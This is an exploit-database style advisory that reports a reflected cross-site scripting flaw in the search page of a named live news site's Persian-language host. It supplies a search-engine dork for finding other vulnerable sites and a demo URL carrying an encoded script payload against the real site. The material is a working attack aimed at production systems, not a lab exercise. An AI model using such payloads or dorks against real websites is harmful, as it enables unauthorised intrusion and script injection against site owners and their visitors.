################################################## ################################################## #####################
# #
# Exploit Title : Sputnik News Russian government has XSS vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : sputniknews.com (https://ir.sputniknews.com) #
# #
# Tested ON : Persian language version Host #
# #
# Security Risk : ~[LOW]~ #
# #
# Description : Description: All websites with this version used can be targeted #
# #
# DorK : "intext:"search/?query="" #
# #
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "search"
XSS Expl0iTs :
https://ir.sputniknews.com/search/?query=XSS Codes
Dem0 :
https://ir.sputniknews.com/search/?query=%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E